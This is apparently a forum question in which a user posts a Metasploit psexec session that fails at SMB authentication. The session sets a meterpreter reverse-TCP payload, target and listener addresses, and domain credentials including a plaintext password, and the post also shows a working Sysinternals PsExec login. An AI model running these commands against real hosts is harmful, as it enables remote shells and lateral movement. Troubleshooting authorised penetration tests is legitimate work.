Knowledge Base

Ask A Question

Questions

1

psexec exploit in metasploit

Hi All, Please see the error message when running exploit. It does not seem to get past authentication. msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set RHOST 139.49.19.13 RHOST => 139.49.19.13 msf exploit(windows/smb/psexec) > set LHOST 139.49.153.201 LHOST => 139.49.153.201 msf exploit(windows/smb/psexec) > set SMBDomain CORP SMBDomain => CORP msf exploit(windows/smb/psexec) > set SMBUser "localadmin" SMBUser => localadmin msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd" SMBPass => MrPassw0rd msf exploit(windows/smb/psexec) > set LPORT 4444 LPORT => 443 msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on 139.49.153.201:4444 [*] 139.49.19.13:445 - Connecting to the server... [*] 139.49.19.13:445 - Authenticating to 139.49.19.13:445| as user 'CORP\localadmin'... [-] 139.49.19.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host. [*] Exploit completed, but no session was created. msf exploit(windows/smb/psexec) > version Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b I tested authentication by running the sysinternals psexec Outside of metasploit. psexec was successful. C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\139.49.19.13 -u CORP\localadmin cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Password: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami CORP\localadmin Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA

Posted by aa 11 months ago